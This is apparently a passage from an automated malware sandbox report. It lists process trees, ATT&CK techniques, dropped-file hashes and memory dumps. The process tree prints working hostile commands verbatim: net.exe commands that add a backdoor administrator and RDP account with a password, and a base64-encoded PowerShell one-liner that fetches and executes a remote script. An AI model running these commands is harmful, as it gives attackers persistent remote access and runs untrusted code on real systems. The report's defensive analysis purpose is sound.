PID:1740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:844

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WyUVN0Zl /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3108

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc WyUVN0Zl /add
2⤵
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl /add
3⤵
PID:4708

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:5428

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:2692

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
1⤵
PID:468

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
2⤵
PID:2380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
3⤵
PID:5032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:752

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:1228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:2996

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WyUVN0Zl
1⤵
PID:1216

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc WyUVN0Zl
2⤵
PID:392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl
3⤵
PID:2444

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2536

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5488

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4364

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES470B.tmp
Filesize
1KB

MD5
2fed60c3e2a98d72607dfafbc6f6f7ba

SHA1
53fa5796bc6b0e3e4e2f29a40467359be0ec2474

SHA256
ba2f39b5d9490d462a0b84ce0e3e63f599d8e1d6ee64b994a4aba993bcbc1679

SHA512
365c5876f7337ef7f5f3028ba3cdc3ddc8a8c7780c64297d756c284056c3dfdd358906cc3889a06bcda74317a4746771c0a3eecac8eddf36a3951db302df8573

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja0cfd21.3an.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
Filesize
2.5MB

MD5
1c42eeda1f1bcf1b607aae8a13af258a

SHA1
3ceae3bbf209e777069cad37f0073c00564b7060

SHA256
300199ee623af4efb07d6904e943bb1807f9e58efb6cae448630aa3c16e4fb75

SHA512
5579df57fcbb7a4958cb2630e9d4fe7cbbd10821182227e1a64c522c98e254135720f26eda05c2e9c5959b40fed480e90aa10ba47be602d8c843ac965d8a0853

Download Submit
C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.dll
Filesize
3KB

MD5
0b23b0d02417d619b0f6af4e4d06d1f2

SHA1
af4d419bc191eb3356b18a88a77e8dd0e5258039

SHA256
b2114df04d37c0e4c5a7df78d4c47cdf4474e1c8c37783167b1b81b6681b85cd

SHA512
03bf8c4f8b5e5624ba44535cf627c97cbef0975ab02aaedcdc019afd40039f9548ab94382b61072cb568b0c349552d731ce07e52c9102dab630331a6114ea2b4

Download Submit
C:\Windows\Branding\mediasrv.png
Filesize
60KB

MD5
5e1182125ef143f791788d0dc4bf3e9b

SHA1
dfb1e962e91de4a90ebe27d454801ac182e15106

SHA256
a3355f5763c1189c54710459c0bb09182491544dc087f301827669947b951b10

SHA512
e4db09adcc2c7ce86a8a6cea4fc1522ef6d17466e468137bac6e86849b10839bf0a5a77469fa135f41a1885471433d33d18113c0c23daa604f2e84330e9ad3ea

Download Submit
C:\Windows\Branding\mediasvc.png
Filesize
743KB

MD5
6d38a0137dd439eb26f8f19d2bb50b83

SHA1
392ae467b6e5c796669a746d67924529241e51cf

SHA256
60fc94385520b4353ddc0d9fda9698f4f61ff74abaf794525b9828f8bc24ed0a

SHA512
31141bb3943202b0081078312b3551e0b931520e8dd3661fa75075d016c7d6ad9c9f6e259c555ca4b52e8e7a7344bffbdf65ba0e4f897ecbcf625c3bb09b40b7

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmp
Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMP
Filesize
652B

MD5
6467486360d173ddd72f4550ccb764ca

SHA1
fc61c70e5195b02aebbe7e8ec5ff7b966e9630bc

SHA256
f7a0a2230daa4325397445fbcdb9e3fd11b23e25f5fb54824c0a7150e3081f3a

SHA512
bbbf91749aa2c793fa07a1204b8494b045dd32bb8921ecacfaa96b43e36d19ba960184dab10cd0f0b29542567bf860f49ac80ea8b45e601640a4812dc3c8d484

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.0.cs
Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdline
Filesize
369B

MD5
871027a71f42549e96ad7b4001b974ea

SHA1
0547df0d290e4203f7bedfb42a51360725fe483f

SHA256
87da13785264c45af7b1c0077c12b1f213973f972b862e54236c7b6eadf99649

SHA512
81e3588e3fc7986e11a77119f76ed8f93a7b1c0a133430d500bd814de0edff194078266f8c01b313262433d0f54e18994d35153548a99da43a9e2e27cc03943a

Download Submit
memory/2068-63-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2068-53-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2136-104-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2136-145-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2136-142-0x000002185D580000-0x000002185D590000-memory.dmp

Filesize
64KB

Download
memory/2636-2-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp

Filesize
64KB

Download
memory/2636-0-0x000001FE9A560000-0x000001FE9A810000-memory.dmp

Filesize
2.7MB

Download
memory/2636-98-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp

Filesize
64KB

Download
memory/2636-3-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp

Filesize
64KB

Download
memory/2636-4-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp

Filesize
64KB

Download
memory/2636-93-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp

Filesize
64KB

Download
memory/2636-1-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2636-154-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/2636-64-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/4500-75-0x00000204214C0000-0x00000204214D0000-memory.dmp

Filesize
64KB

Download
memory/4500-76-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/4500-74-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5144-109-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5144-146-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-77-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmp

Filesize
100KB

Download
memory/5144-7-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5144-23-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-152-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmp

Filesize
100KB

Download
memory/5144-151-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5144-39-0x0000018A625D0000-0x0000018A627DA000-memory.dmp

Filesize
2.0MB

Download
memory/5144-38-0x0000018A62240000-0x0000018A623B6000-memory.dmp

Filesize
1.5MB

Download
memory/5144-37-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-8-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-110-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-34-0x0000018A49960000-0x0000018A49968000-memory.dmp

Filesize
32KB

Download
memory/5144-141-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-15-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5144-14-0x0000018A61BC0000-0x0000018A61BE2000-memory.dmp

Filesize
136KB

Download
memory/5144-148-0x0000018A49970000-0x0000018A49980000-memory.dmp

Filesize
64KB

Download
memory/5184-52-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5184-49-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp

Filesize
10.8MB

Download
memory/5184-50-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmp

Filesize
64KB

Download
memory/5184-51-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmp

Filesize
64KB

Download